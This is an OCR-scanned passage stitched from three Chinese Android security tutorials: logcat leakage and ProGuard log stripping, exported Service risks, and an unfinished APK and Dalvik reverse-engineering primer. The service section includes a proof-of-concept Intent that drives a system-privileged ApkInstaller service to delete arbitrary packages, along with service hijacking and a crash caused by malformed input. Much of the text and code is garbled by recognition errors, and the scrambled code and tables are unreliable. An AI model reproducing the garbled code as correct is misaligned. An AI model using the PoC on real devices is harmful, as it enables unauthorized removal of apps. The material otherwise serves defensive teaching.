11-04 12:56:50.902 26675 26675 org. wooyun. hiwooyun pessword password 


0x03 建议 


有 些 人 认为 任何 log 都 不 应 该 在 发 行 版 本 打印 。 但 是 为 了 app 的 错误 采集 ， 异 常 反馈 ， 必 要 的 
日 志 还 是 要 被 输出 的 ， 只 要 遵循 安全 编码 规范 就 可 以 将 风险 控制 在 最 小 范围 。 

Log.e()/w()/i() : 建议 打印 操作 日 志 

Log.d(yv() : 建议 打印 开发 日 志 

1、 敏 感 信 息 不 应 用 Log.e()/w()/i(), System.out/err 打印 。 

2、 如 果 需 要 打印 一 些 敏感 信息 建议 使 用 Log.d()/v()。 (前提 : release 版 本 将 被 自动 去 除 ) 
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@Override 

public void onCreate(Bundle savedInstanceState) { 

super.onCreate(savedInstanceState); 

setContentView(R.layout.activity proguard); 

// *** POINT 1 *** Sensitive information must not be output by Log.e()/w()/i(), System 
Outen 

Log.e(LOG_TAG, "Not sensitive information (ERROR)"); 

Log.w(LOG_TAG, "Not sensitive information (WARN)"); 

Log.i(LOG_TAG, "Not sensitive information (INFO)"); 

// *** POINT 2 *** Sensitive information should be output by Log.d()/v() in case of ne 
ed: 

// *** POINT 3 *** The return value of Log.d()/v()should not be used (with the purpose 
of substitution or comparison). 

Log.d(LOG TAG, "sensitive information (DEBUG)"); 

Log.v(LOG TAG, "sensitive information (VERBOSE)"); 


} 


3、Log.d()/v() 的 返回 值 不 应 被 使 用 。 ( 仅 做 开发 调试 观测 ) 


Examination code which Log.v() that is specifeied to be deleted is not deketed 

int i = android.util.Log.v("tag", "message"); 
System.out.println(String.format("Log.v() returned %d. ", i)); //Use the returned valu 
e of Log.v() for examination 


4 ` release/Kapk 实现 自动 删除 Log.d()/v() 等 代码 。 
eclipse 中 配置 ProGuard 


A part of project.properties 
# ProGuard 
proguard.configsproguard-project.txt 










proguard-project.txt 
# prevent from changing class name and method name etc. 
-dontobfuscate 


# *** POINT 4 *** In release build, the build configurations in which Log.d()/v() are deleted automatically should be 
constructed. 
-assumenosideeffects class android.util.Log ( 
public static int d(...); 
public static int v(...); 








开发 版 所 有 log 都 打印 出 来 了 。 
| [memes] IDA 上 
t 





Es (Time E | PID TID Application Tag Text 

D 11-03 15:56:28.229 4051 4051 com.example.voicer Zjdroid-apimonitor-com... Invoke android.app.ConteatImpl->sregiacerRece 

D 11-03 15:56:28.229 4051 4051 com. example. voicer zjdroid-apimonivor-com... Register BroatcastReceiver 

D 11-03 15:56:28.229 4051 4051 com. example. voicer zjdroid-apimonitor-com... The BroatcastReceiver ClassHame = claes com. 
astReceiver 

D 11-03 15:56:28.229 4051 4051 com. example. voicer zjdroid-apimonitor-com... Intent Action = [com.zjdroid. invoke, ] 

D 11-03 15:56:28.249 4951 4051 ccom.exanple.vcicer dalvikvn JIT code cache reset in 0 oe (0 bytes 2/0) 

D 11-03 15:56:28.249 4051 4051 com. example. voicer dalvikvn GC FOR ALLOC freed 443K, 34 free 17142K/176( 

E 11-03 15:56:28.249 4951 4051 com.example.voicer MainActivity error 47 

^ 11-03 15:56:25.249 $951 $031 CCX.eX&Eple.voicer MainActivzty warn = 

z 11-03 15:56:28.249 4051 4051 com.example.voicer MainActivity infc 在 

D 11-03 15:56:25.249 4951 4051 Ccm.exanple.vcicer MainActivity debug iE 

v 11-03 15:56:25.249 4051 4081 com.example.voicer MainActivity verbose E 


发 行 版 ProGuard 移 除 了 d/v 的 log 
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ah Problems @ Javadoc 区 Declaration EJ Console ED LogCat 5: & Lint Warnings 





Saved Filters s+- 
All messages (no filters) (108( 


Search for messages. Accepts Java regexes. Prefix with pid: app: tag: or text: to limit scope. 


wt icat 3 
com.cplatform.android.cmsur 5 me m TD Application Tag ext 
[Main&ciiy 人 人 A sivi E 11-03 16:21:31.293 3249 3249 MainActivity error 
comaexamplewoicer (Session | " 12-09 16:21:3:.295 — 3249 — 3208 Mainhetivity vara 
I 11-03 16:21:31.293 3243 3248 MainActivity info 
2» T debugfüverbose T 


反 编 译 后 查看 确实 被 remove 了 
(55 Java Decor piler inAct 








cievies 
| com.example.voicer x| - 





G- £8 com.example.voicer MainActivity.class x 
由 - 国 MainActivity 
Da 
&-[J) b $|import andrcid.app.Activity: 
由 - 国 c 
à à d public class MainActivity 
" extends Activity 





package com.exarple.voicer; 


8-J e { 
&-p f private Button a; 

e ini g private Button b; 

private Button c; 

private Button d; 

private Button e; 

private MediaPlayer f = new MediaPlayer(); 
private MediaPlayer g; 

private MediaPlayer h; 


public void onCreate (Bundle paramBundle| 


super.onCreete (psremBundle) ; 

Log.e(*MainActivity", "error"): 
Log.v(*MainActivity", "warn"); 
Log.i("MainActiviry", "info"); 
setContentView(2130203040); 
ai z n VICwEYy vie 


this.b = ( (Button) findViewById (2131296257) ); 


thie ^ — ((Rnurroni fin asRiulas2137 70RA 1 * 














5、 公 开 的 APK 文件 应 该 是 release 版 而 不 是 development hk ° 


0x04 native code 


android.util.Log 的 构造 函数 是 私有 的 ， 并 不 会 被 实例 化 ， 只 是 提供 了 静态 的 属性 和 方法 。 
而 android.util.Log 的 各 种 Log 记录 方法 的 实现 都 依赖 于 native 的 实现 println. native() > 
Log.v()/Log.d()/Log.i()/Log.w()/Log.e() 最 终 都 是 调用 了 println_native()。 


Log.e(String tag, String msg) 
public static int v(String tag, String msg) { 

return println_native(LOG_ID_MAIN, VERBOSE, tag, msg); 
} 
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println native(LOG ID MAIN, VERBOSE, tag, msg) 
T= 
in class andpordsutad.| Log: 
* public static native int println_native(int buffer, int priority, String tag, Stri 
ng msg) 
ay 
static jint android util Log println native(JNIEnv* env, jobject clazz, 
jint bufID, jint priority, jstring tagObj, jstring msgObj) 








const char* tag 
const char* msg 


NULL; 
NULL; 


if (msgObj == NULL) { 
jniThrowNullPointerException(env, "println needs a message"); 
return -1; 


} 


if (bufID < © || bufID >= LOG_ID_MAX) { 
jniThrowNullPointerException(env, "bad bufID"); 
return; 


} 
if (tagObj != NULL) 
tag = env-»GetStringUTFChars(tagObj, NULL); 
msg = env-»GetStringUTFChars(msgObj, NULL); 
int res = __android_log_buf_write(bufID, (android LogPriority)priority, tag, msg); 
if (tag != NULL) 
env->ReleaseStringUTFChars(tagObj, tag); 
env->ReleaseStringUTFChars(msgObj, msg); 


return res; 


} 


XT android log buf write() 又 调用 了 write to log 函数 指针 。 


static int write_to_log_init(log_id_t log_id, struct iovec *vec, size_t nr) 





{ 

#ifdef HAVE_PTHREADS 
pthread_mutex_lock(&log_init_lock); 

#endif 


if (write_to_log == _write_to_log init) { 
log fds[LOG ID MAIN] = log open("/dev/"LOGGER LOG MAIN, O_WRONLY) ; 
log fds[LOG ID RADIO] = log open("/dev/"LOGGER LOG RADIO, O WRONLY); 
log fds[LOG ID EVENTS] log open("/dev/"LOGGER LOG EVENTS, O0 WRONLY); 
log fds[LOG ID SYSTEM] log open("/dev/"LOGGER LOG SYSTEM, O WRONLY); 





write to log - write to log kernel; 





if (log fds[LOG ID MAIN] < © || log fds[LOG ID RADIO] < © || 
log fds[LOG ID EVENTS] < 9) { 
log close(log fds[LOG ID MAIN]); 
log close(log fds[LOG ID RADIO]); 
log close(log fds[LOG ID EVENTS]); 
log fds[LOG ID MAIN] = -1; 
log fds[LOG ID RADIO] = -1; 
log fds[LOG ID EVENTS] = -1; 
write to log - write to log null; 





} 


if (log_fds[LOG_ID_SYSTEM] < 0) { 
log_fds[LOG_ID_SYSTEM] = log_fds[LOG_ID_MAIN]; 
} 


} 


#ifdef HAVE_PTHREADS 
pthread_mutex_unlock(&log_init_lock); 
#endif 


return write_to_log(log_id, vec, nr); 
总 的 来 说 println_native() 的 操作 就 是 打开 设备 文件 然后 写 入 数据 。 


0x05 其 他 注意 


1、 使 用 Log.d()/v() 打印 异常 对 象 。 (如 SQLiteException 可 能 导致 sql 注 入 的 问题 ) 
2、 使 用 android.util.Log 类 的 方法 输出 日 志 ， 不 推荐 使 用 System.out/err 

3、 使 用 BuildConfig.DEBUG ADT 的 版 本 不 低 于 21 

public final static boolean DEBUG = true; 


在 release 版 本 中 会 被 自动 设置 为 false 
if (BuildConfig.DEBUG) android.util.Log.d(TAG, "Log output information"); 


4 ^ È ahActivity 的 时 候 ，ActivityManager 会 输出 intent 的 信息 如 下 : 


目标 包 名 
目标 类 名 
intent.setData(URL) 4 URL 


(^: Problems @ Javadoc [®, Declaration EJ Console D LogCat 53 


IZ Lint Warnings 





t-g 


All messages (no filters) (3837 


Saved Filters m.baidu.com 


comieplatformandroidenisur | Seeon 
MainActivity 
OT 
System.out (120) 

System.err (2136) 
TETTE 


Tag 


ActivityManager 


ActivityManager 


ActivityManager 


verbose | Ed & (iD) 4 






Text 

START u0 {act=android.action.VIEW dat=http://m.baidu.com flg-0x10000000) from O 
pid 29742 

START u0 {act=android.intent.action.VIEW dat=http://m.baidu.com flg-0x100000€ 

0 cmp=android/com. android. internal.app.Resolve 





EW dat-http://m.baidu.com flg-0x1300000 O 





START {act=android.intent.action 


0 cmp=com.qihoo.browser/.BrowserActivity} from pid 29835 





5、 即 使 不 用 System.out/err 程序 也 有 可 能 输出 相关 信息 ， 如 使 用 


Exception.printStackTrace() 


6 ` ProGuard 不 能 移 除 如 下 log : ("result:" + value). 


Log.d(TAG, 


"result:" + value); 


当 遇 到 此 类 情况 应 该 使 用 BulidConfig (注意 ADT 版 本 ) 


if (BuildConfig.DEBUG) Log.d(TAG, 


"result:" + value); 


7、 不 应 将 日 志 输 出 到 sdscard 中 ， 这 样 会 让 日 志 变 得 全 局 可 读 


0x06 HELAR 


Android Logcat Security 


import android.util.Log; 


Js S 
* Log 统 一 管理 类 
* 
* 
* 
yf 
public elass 


{ 


private L() 


/* cannot be instantiated 


e 


throw new UnsupportedOperationException("cannot be instantiated"); 


} 


public static boolean isDebug = true;// 是 否 


数 里 面 初 始 化 
private static final String 
// 下 面 四 个 是 默认 tag 的 函数 
public static void i(String 


{ 
if (isDebug) 
Log.i(TAG, msg); 
} 
public static void d(String 
{ 
if (isDebug) 
Log.d(TAG, msg); 
} 
public static void e(String 
{ 
if (isDebug) 
Log.e(TAG, msg); 
} 
public static void v(String 
{ 


if (isDebug) 
Log.v(TAG, msg); 


// 下 面 是 传 入 自 定义 tag 的 函数 
public static void i(String 


{ 
if (isDebug) 
Log.i(tag, msg); 
} 
public static void d(String 
{ 
if (isDebug) 
Log.i(tag, msg); 
} 
public static void e(String 
{ 
if (isDebug) 
Log.i(tag, msg); 
} 
public static void v(String 
{ 
if (isDebug) 
Log.i(tag, msg); 
} 


TAG 


msg) 


msg) 


msg) 


msg) 


tag, 


tag, 


tag, 


tag, 


"way" n 


String 


String 


String 


String 


msg) 


msg) 


msg) 


msg) 


de 
"mu 


要 打印 Dug， 可 以 在 application 的 onCreate 骂 
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0x07 参考 


http://www.jssec.org/dl/android_securecoding_en.pdf 
http://source.android.com/source/code-style.html#log-sparingly 
http://developer.android.com/intl/zh-cn/reference/android/util/Log.html 
http://developer.android.com/intl/zh-cn/tools/debugging/debugging-log.html 
http://developer.android.com/intl/zh-cn/tools/help/proguard.html 
https://www.securecoding.cert.org/confluence/display/java/DRD04- 
J.+Do+not+tlog+sensitivetinformation 
https://android.googlesource.com/platform/frameworks/base. git/+/android- 
4.2.2 r1/core/jni/android util Log.cpp 
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原文 by JS 9& € 


0x00 科普 


— ^ Service 是 没有 界面 且 能 长 时 间 和 运行 于 后 台 的 应 用 * 其 它 应 用 的 组 件 可 以 启动 一 个 服 

务 运 行 于 后 台 ， 即 使 用 户 切换 到 另 一 个 应 用 也 会 继续 运行 另外， 一 个 组 件 可 以 绑 定 到 一 个 

Service 来 进行 交互 ， 即 使 这 个 交互 是 进 例如 ， AR eae 
通信 ， 播 放 音 乐 ， 执 行文 件 |//O 〇 ， 或 与 一 个 内 容 提供 者 交互 ， 所 有 这 些 都 在 后 台 进 


1. Service 不 是 一 个 单独 的 进程 , 它 和 它 的 应 用 程序 在 同一 个 进程 中 

2，Service 不 是 一 个 线程 ,这 样 就 意味 着 我 们 应 该 避免 在 Service 中 进行 耗 时 操作 

3. Android 给 我 们 提供 了 解决 上 述 问 题 的 替代 品 IntentService ; IntentService 是 继承 于 
Service 并 处 理 异 步 请 求 的 一 个 类 ， 
在 IntentService 中 有 一 个 工作 线程 来 处 理 耗 时 操作 ' 请 求 的 Intent 记 录 会 加 入 队列 

4. 客户 端 通过 startService(lntent) 来 启动 IntentService， 我 们 并 不 需要 手动 地 去 控制 
IntentService， 当 任务 执行 完 后 ，lntentService 会 自动 停止 ; 可 以 启动 IntentService 多 次 ， 
每 个 耗 时 操作 会 以 工作 队列 的 方式 在 IntentService 的 onHandlelntent 回调 方法 中 执行 ， 
并 且 每 次 只 会 执行 一 个 工作 线程 ， 执 行 完 一 再 到 二 


0x01 知识 要 点 
生命 周期 


Android Service Security 





onCreate() 


om 


"v 
N 


onio | | onDestroy() 





Unbounded Bounded 
service diey 0 0 yug 
左 图 是 startService() 4] service * 4 A X bindService() 创建 service。 startService 4 
bindService 都 可 以 启动 Service， 那 么 它们 之 间 有 什么 区 别 呢 ? 它们 两 者 的 区 别 就 是 使 
Service 的 周期 改变 。 


由 startService 启动 的 Service 必 须要 有 stopService 来 结束 Service， 不 调用 stopService 则 会 
造成 Activity 结束 了 而 Service 还 运行 着 。bindService 启动 的 Service 可 以 由 unbindService 来 
结束 ， 也 可 以 在 Activity 结束 之 后 (onDestroy) 自动 结束 。 


关键 方法 


e onStartCommand() 系统 在 其 它 组 件 比如 activity 通过 调用 startService() 请 求 service 启 动 
Pis .一旦 这 个 方法 执行 ，service 就 启动 并 且 在 后 台 长 期 运行 如果 你 实现 
了 它 ， 你 需要 负责 在 service 完成 任务 时 停止 它 ， 通 过 调用 stopSelf() 或 stopService() - 
mrs A pp ， 你 不 需 实现 此 方法 ): 


e OnBind() 当 组 件 调 用 bindService() 想 要 绑 定 到 service 时 (比如 想 要 执行 进程 间 通 讯 ) 系 统 
调用 此 方法 .在 你 的 实现 中 ， 你 必须 提供 一 个 返回 一 个 IBinder 来 以 使 客户 端 能 够 使 用 它 
与 service 通讯 ， 你 必须 总 是 实现 这 个 方法 ， 但 是 如 果 你 不 允许 绑 定 ， 那 么 你 应 返回 
null : 
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。 OnCreate() 系统 在 service 第 一 次 创建 时 执行 此 方法 ， 来 执行 只 运行 一 次 的 初始 化 工作 (在 
调用 它 方 法 如 onStartCommand() 或 onBind() 之 前 ). 如 果 service 已 经 运行 ， 这 个 方法 不 会 
被 调用 


e OnDestroy() 系统 在 service 不 再 被 使 用 并 要 销毁 时 调用 此 方法 :你 的 service 应 在 此 方法 
中 释放 资源 ， 比 如 线程 ， 已 注册 的 侦 听 器 ， 接 收 器 等 等 : 这 是 service 收 到 的 最 后 一 个 调 
用 


e public abstract boolean bindService (Intent service, ServiceConnection conn, int flags) 
BindService 中 使 用 bindService() 方 法 来 绑 定 服务 ， 调 用 者 和 绑 定 者 绑 在 一 起 ， 调 用 者 一 
旦 (al 退出 服务 也 就 终止 了 . 


e startService() startService() 方 法 会 立即 返回 然后 Android 系统 调用 service 的 
onStartCommand() 方法 : 但 是 如 果 service 尚 没有 运行 ， 系 统 会 先 调 用 onCreate()， 然 
后 调用 onStartCommand(). 


e protected abstract void onHandlelntent (Intent intent) 调用 工作 线程 处 理 请 求 


e public boolean onUnbind (Intent intent) 当 所 有 client 均 从 service 发 布 的 接口 断 开 的 时 候 被 
调用 。 默 认 实 现 不 执行 任何 操作 ， 并 返回 false。 


extends 


1. Service 这 是 所 有 service 的 基 类 . 当 你 派生 这 个 类 时 ， 在 service 中 创 ee a 
做 所 有 的 工作 是 十 分 重要 的 因为 这 个 service 会 默认 使 用 你 的 应 用 的 主线 程 (UI 线 程 ) ， 
将 拉 低 你 的 应 用 中 所 有 运行 的 activity 的 性 能 


2. IntentService 这 是 一 个 Service 的 子 类 ， 使 用 一 个 工作 线程 来 处 理 所 有 的 启动 请 求 ， 一 次 
处 理 一 个 . 这 是 你 不 需 你 的 service 同时 处 理 多 个 请 求 时 的 最 好 选择 . 你 所 有 要 做 的 就 是 
实现 onHandlelntent()， 这 个 方法 接收 每 次 司 动 请 求 发 来 的 intent， 于 是 你 可 以 做 后 台 的 工 
作 >» 


表现 形式 


1. Started 一 个 service 在 某 个 应 用 组 件 i a 时 就 处 
于 "started" 状 态 (注意 ， 可 能 已 经 启动 了 ) :一 旦 运行 后 ，service 可 以 在 后 台 无 限期 地 运 
n ， 即 使 启动 它 的 组 件 销毁 了 - he ， 一 个 startedservice 执 行 一 个 单一 的 操作 并 且 不 
返回 给 调用 者 结果 : 例如 ， 它 可 能 通过 网 络 下 载 或 上 传 一 个 文件 . 当 操 作 完成 后 ， 
service 自 己 就 停止 了 


2. Bound 一 个 service 在 茶 个 应 用 组 件 调 用 bindService() 时 就 处 于 "bound" 状 态 : 一 个 
te i ae 以 使 组 件 可 以 与 service 交 互 ， 发 送 请 求 ， 获 取 结 
果 ， 其 至 通过 进程 间 通 讯 进 行 交 又 进行 这 些 交 互 . 一 个 boundservice 仅 在 有 其 它 应 用 的 


组 件 绑 定 它 时 运行 :多 个 应 用 组 件 可 以 同时 绑 定 到 一 个 service， 但 是 当 所 有 的 自由 竞争 
21+ ALB X > services A4 T - 


Bound Service 


当 创 建 一 个 提供 绑 定 的 service 时 ， 你 必须 提供 一 个 客户 端 用 来 与 service 交 互 的 |IBinder . 有 三 
种 方式 你 可 以 定义 这 个 接口 : 


1. A. Binder?& ^E. 如 果 你 的 service 是 你 自己 应 用 的 私有 物 ， 并 且 与 客户 端 运行 于 同一 个 进 
程 中 (一 般 都 这 样 )， 你 应 该 通过 从 类 Binder 派 生来 创建 你 的 接口 并 且 从 onBind() 返 回 一 它 
的 实例 . 客户 端 接收 这 个 Binder 然 后 使 用 它 来 直接 操作 所 实现 的 Binder 其 至 Service 的 公 
共 接 口 


2， 当 你 的 service 仅仅 是 一 个 后 台 工 作 并 且 仅 服务 于 自己 的 应 用 时 ， 这 是 最 好 的 选择 .唯一 
使 你 不 能 以 这 种 方式 创建 你 的 接口 的 理由 就 是 你 的 service 被 其 它 应 用 使 用 或 者 是 跨 进 程 
ag 


1. 使 用 一 个 Messenger 如 果 你 需要 你 的 接口 跨 进程 工作 ， 你 可 以 为 service 创建 一 个 带 有 
Messager 的 接口 : 在 此 方式 下 ，service 定义 一 个 Handler 来 负责 不 同类 型 的 Message 
xt R - 这 个 Handler 是 Messenger 可 以 与 客户 端 共享 一 个 IBinder 的 基础 ， 它 允许 客户 端 使 
M Message 对 象 发 送 命令 给 service - 客户 端 可 以 定义 一 个 自己 的 Messenger 以 使 service 
可 以 回 发 消息 . 这 是 执行 IPC 的 最 简单 的 方法 ， 因 为 Messenger 把 所 有 的 请 求 都 放 在 队 
列 中 依次 送 入 一 个 线程 中 ， 所 以 你 不 必 把 你 的 service 设计 为 线程 安全 的 


2. 使 用 AIDL AIDL(Android 接口 定义 语言 ) 执 行 把 对 象 分 解 为 操作 系统 能 够 理解 并 能 跨 进 程 
封 送 的 基本 体 以 执行 IPC 的 所 有 的 工作 . 上 面 所 讲 的 使 用 一 个 Messenger， 实 际 上 就 是 基 
于 AIDL 的 : 就 像 上 面 提 到 的 ，Messenger 在 一 个 线程 中 创建 一 个 容纳 所 有 客户 端 请 求 的 
队列 ， 使 用 service 一 个 时 刻 只 接收 一 个 请 求 . 然而 ， 如 果 你 想 要 你 的 service 同 时 处 理 多 
个 请 求 ， 那 么 你 可 以 直接 使 用 AIDL ' 在 此 情况 下 ， 你 的 service 必 须 是 多 线程 安全 的 . 要 
直接 使 用 AIDL， 你 必须 创建 一 个 .aidl 文 件 ， 它 定义 了 程序 的 接口 Android SDK 工具 使 
用 这 个 文件 来 生成 一 个 实现 接口 和 处 理 IPC 的 抽象 类 ， 之 后 你 在 你 的 service 内 派生 它 - 


注 : 大 多 数 应 用 不 应 使 用 AIDL 来 处 理 一 个 绑 定 的 service， 因 为 它 可 能 要 求 有 多 线程 能 力 并 且 
导致 实现 变 得 更 加 复杂 :同样 的 ，AIDL 也 不 适合 于 大 多 数 应 用 ， 并 且 本 文档 不 会 讨论 如 何在 
你 的 service 中 使 用 它 . 如 果 你 确定 你 需要 直接 使 用 AIDL， 请 看 AIDL 的 文档 - 


> 音 
ERS 


如 果 你 打算 只 在 本 应 用 内 使 用 自己 的 service， 那 么 你 不 需 指定 任何 intent 过 滤器 .不 使 用 
intent 过 滤器 ， 你 必须 使 用 一 个 明确 指定 service 的 类 名 的 intent 来 启动 你 的 service - 

另外 ， 你 也 可 以 通过 包含 android:exported 属 性 ， 并 指定 其 值 为 “false" 来 保证 你 的 Service 是 私 
有 的 .即使 你 的 service 使 用 了 intent 过 滤器 ， 也 会 起 作用 - 

当 一 个 service 被 启动 后 ， 它 的 生命 期 就 不 再 依赖 于 启动 它 的 组 件 并 且 可 以 独立 运行 于 后 台 ， 


BPI B x0] Z8 EORR T - 所 以 ，service 应 该 工作 完成 后 调用 stopSelf() 自己 停止 掉 ， 或 者 
其 它 组 件 也 可 以 调用 stopService() 停止 service * 如 果 service 没 有 提供 绑 定 功能 ， 传 给 
startService() 的 intent 是 应 用 组 件 与 service 之 间 唯 一 的 通讯 方式 然而， 如果 你 希望 service 
回 发 一 个 结果 ， 那 么 启动 这 个 service 的 客户 端 可 以 创建 一 个 用 于 广播 (使 用 getBroadcast()) 的 
Pendinglntent 然后 放 在 intent 中 传 给 service，service 然 后 就 可 以 使 用 广播 来 回 送 结果 - 


0x02 安全 建议 
service 分 类 









the safest service. 
number of applications 
a trusted partner company. 


In-house Service A service that can only be used by other in-house applications. 






Use only in 
e same application? 





Yes Allow unspecified number 
applications to use? 
Yes 





私有 service: 不 能 被 其 他 应 用 调用 ,相对 安全 
公开 service: 可 以 被 任意 应 用 调用 

合作 service: 只 能 被 信任 合作 公司 的 应 用 调用 
内 部 Service: 只 能 被 内 部 应 用 调用 


intent-filter 与 exported 组 合 建议 











Os E Value of exported attribute 

bii = True false Not specified 
Intent Filter defined Public (Do not Use) (Do not Use) 
Intent Filter Not | Public, Partner, Private (Do not Use) 
Defined In-house 








总 结 : 

exported 属 性 明确 定义 

私有 service 不 定义 intent-filter 并 且 设 置 exported 为 false 

公开 的 service 设 置 exported 为 true,intent-filter 可 以 定义 或 者 不 定义 
内 部 /合作 service 设 置 exported 为 true,intent-filter 不 定义 


rule book 
1. 只 被 应 用 本 身 使 用 的 service 应 设置 为 私有 
2. serviced£ Al 8| ig 246 RIS WAL XE 
3. 内 部 service 需 使 用 签名 级 别 的 protectionLevel 来 判断 是 否 是 内 部 应 用 调用 


4. 不 应 在 service 创 建 (onCreate 方 法 被 调用 ) 的 时 候 决定 是 否 提供 服务 ,应 在 
onStartCommand/onBind/onHandlelntent 等 方法 被 调用 的 时 候 做 判断 . 


5. 4service 有 返回 数据 的 时 候 ,应 判断 数据 接收 app 是 否 有 信息 泄露 的 风险 
6. 有 明确 的 服务 需 调 用 时 使 用 显 式 意 图 
7. 尽量 不 发 送 敏感 信息 


8. 合作 service 需 对 合作 公司 的 app 签名 做 效 验 


0x03 测试 方法 
1. service ^ /$ broadcast receicer， 它 只 能 静态 注册 ,通过 反 编 译 查 看 配置 文件 
Androidmanifest.xml 即 可 确定 service, 若 有 导出 的 service 则 进行 下 一 步 
2. 方法 查看 service 类 ,重点 关注 onCreate/onStarCommand/onHandlelntent 方法 
3， 检 索 所 有 类 中 startService/bindService 方法 及 其 传递 的 数据 


4. 根据 业务 情况 编写 测试 poc 或 者 直接 使 用 adb 命 令 测 试 


0x04 和 案例 





案例 1 : 权限 提升 


乐 phone 手 机 出 厂 默 认 包 含 一 个 名 为 jp.aplix.midp.tools 的 应 用 包 。 本 应 用 以 system 权 限 运 行 ， 
并 向 其 他 应 用 提供 Apklnstaller 服 务 ， 用 来 进行 对 Apk 文 件 的 安装 和 删除 。 通 过 向 Apklnstaller 
服务 传递 构造 好 的 参数 ， 没 有 声明 任何 权限 的 应 用 即 可 达到 安装 和 删除 任意 Package 的 行为 ， 
对 系统 安全 性 产生 极 大 影响 。 


安 
安 


Intent in = new Intent(); 


in.setComponent(new ComponentName("jp.aplix.midp.tools","jp.aplix.midp.tools.ApkInstal 
ieri), 


in.putExtra("action", "deleteApk"); 
in.putExtra("pkgName", "xxxxx"); 


startService(in); 


案例 2:services 劫持 


攻击 原理 : 隐 式 启动 services, 当 存在 同名 services, 先 安装 应 用 的 services 优 先 级 高 攻击 模型 


Application C 
Application B Call the service with 
the implicit intent 


Public Service B-1 Intent(“X”) 


exported= true 
action=" X” 





Application A 
Call a service with 
the implicit intent 


Intent(“X”) 


Private Service A-1 
exported=“false” 
action="X” 


When application BA that has public 
service is installed earlier than 
applications else, and it is only enabled 
and service B-1 is called unintentionally 
from application A. 


Android device 





案例 3: 拒 绝 服 务 


(java.lang.NullPointerException 空 指针 异常 ) 现在 除了 空 指针 异常 crash 外 还 多 出 了 一 类 
crash:intent 传 入 对 象 的 时 候 ,转化 出 现 弄 常 . Serializable: 


Intent i = getIntent(); 
if(i.getAction().equals("serializable action")) 


1 
i.getSerializableExtra("serializable_key");// AMF # FI Bf 


Parcelable: 
this.b =(RouterConfig) this.getIntent().getParcelableExtra("filed router config");//5l 


REMAR 
POC 内 传 入 畸形 数据 即 可 引发 crash, 修 复 很 简单 捕获 异常 即 可 . 


0x05 参考 


http://developer.android.com/reference/android/app/Service.html 
http://developer.android.com/guide/components/services.html 


Android 逆 向 基础 





原文 by mustime 


APK ` Dalvik = ? #3 fesmali x 44 


APKx t+ 

















dx 
classes.dex aapt 
Byte code 
Other .class files AndroidManifest.xml .apk 
dd 


Resources 
KRAE G 4o 38 APK XH SK HE — MIME A ZIP 89 28 e o RAVE PXZIPJS 46 Zr ACT VUE 
到 内 部 的 文件 结构 ， 例 如 修改 后 组 后 用 RAR 打开 鳄鱼 小 顽皮 APK 能 看 到 的 是 《Google Play 下 
载 的 完整 版 版 本 ) 


Where's My Water .zip\ 


* asset\ < 资源 目录 1 : asset 和 res 都 是 资源 目录 但 有 所 区 别 ， 见 下 面 说 明 > 

* 1ib\ <S0O 库 存放 位 置 ， 一 般 由 NDK 编 译 得 到 ， 常 见于 使 用 游戏 引擎 或 JNI n 
ative 调 用 的 工程 中 > 

* |---armeabi\ | ---<so 库 文件 分 为 不 同 的 CPU 架 构 > 

* |---armeabi-v7aN 

* META-INF\ < 存放 工程 一 些 属性 文件 ， 例 如 Manifest .MF> 

* |---MANIFEST.MF |---the Manifest File 

* |---CERT.RSA |---The certificate of the application. 

* |---CERT.SF |---The list of resources and SHA-1 digest of the correspon 
ding lines in the MANIFEST.MF file. 

* res\ < 资源 目录 2 : asset 和 res 都 是 资源 目录 但 有 所 区 别 ， 见 下 面 说 明 > 

* |---drawableN | ---< 图 片 和 对 应 的 xml 资 源 > 

* |---layout\ |---< 定 义 布局 的 Xml 资源 > 

* |---menuN |--- 存放 应 用 里 定义 菜单 项 的 文件 。 

* |---values\ | - - -存放 其 他 xm1 资 源 文件 ， 如 string，color 定 义 。Sstrings .xml 
定义 了 运行 应 用 时 显示 的 文本 

* AndroidManifest.xml <Android 工 程 的 基础 配置 属性 文件 > 

* classes.dex <Java 代 码 编译 得 到 的 Dalvik VM 能 直接 执行 的 文件 ， 下 面 有 介绍 > 

* resources.arsc < 对 res 目 录 下 的 资源 的 一 个 索引 文件 ， 保 存 了 原 工程 中 strings . xml 等 文件 
内 容 > 


无 关 紧 要 地 注 : asset 和 res 资 源 目 录 的 不 同 在 于 


1. res 目 录 下 的 资源 文件 在 编译 时 会 自动 生成 索引 文件 (RJava) ， 在 Java 代 码 中 用 
R.xxx.yyy 来 引用 ; 而 asset 目 录 下 的 资源 文件 不 需要 生成 索引 ， 在 Java 代 码 中 需要 用 
AssetManager 来 访问 ; 

2. 一 般 来 说 ， 除 了 音频 和 视频 资源 (需要 放 在 raw 或 asset 下 ) ， 使 用 Java 开 发 的 Android 工 
程 使 用 到 的 资源 文件 都 会 放 在 res 下 ; 使 用 C++ 游戏 引擎 (或 使 用 Lua binding 等 ) 的 资源 
文件 均 需 要 放 在 asset 下 。 
因为 Where's My Water 是 使 用 迪斯尼 公司 自家 的 DMO 游 戏 引 敬 开 发 ， 所 以 游戏 中 用 到 的 
所 有 资源 文件 都 存放 在 asset 下 ， 除 了 应 用 图 标 这 些 资源 仍 需要 放 在 res 下 。 


Dalvik 字 节 码 


Dalvik 是 google 专 门 为 Android 操 作 系 统 设 计 的 一 个 虚拟 机 ， 经 过 深度 的 优化 。 虽 然 Android 上 
的 程序 是 使 用 java 来 开发 的 ， 但 是 Dalvik 和 标准 的 java 庶 拟 机 JVM 还 是 两 回 事 。Dalvik VM 是 基 
于 寄存 器 的 ， 而 JVM 是 基于 栈 的 ; Dalvik 有 专属 的 文件 执行 格式 dex (dalvik executable) > 
而 JVM 则 执行 的 是 java 字 节 码 。Dalvik VM 比 JVM 速 度 更 快 ， 占 用 空间 更 少 。 

通过 Dalvik 的 字 节 码 我 们 不 能 直接 看 到 原来 的 逻辑 代码 ， 这 时 需要 借助 如 Apktool 或 
dex2jar+jd-gui 工 具 来 帮助 查看 。 但 是 ， 注 意 的 是 最 终 我 们 修改 APK 需 要 操作 的 文件 是 .smali 文 
件 ， 而 不 是 导出 来 的 Java 文 件 重 新 编译 (况且 这 基本 上 不 可 能 ) 。 

Dalvik 虚拟 机 是 用 c/c++/asm 写 的 ， 即 将 字 节 码 (smali ioa cs 法 ) 解释 运行 ， 最 
终 的 最 底层 还 是 转化 成 机 器 如 arm 的 汇编 (进而 是 完全 的 0 1 二 进 制 ) 在 android 机 上 运行 。 


smali x 4+ 


好 了 ， 对 Dalvik 有 一 定 认 识 后 ， 下 面 介 绍 重点 : smali， 及 其 语法 。 
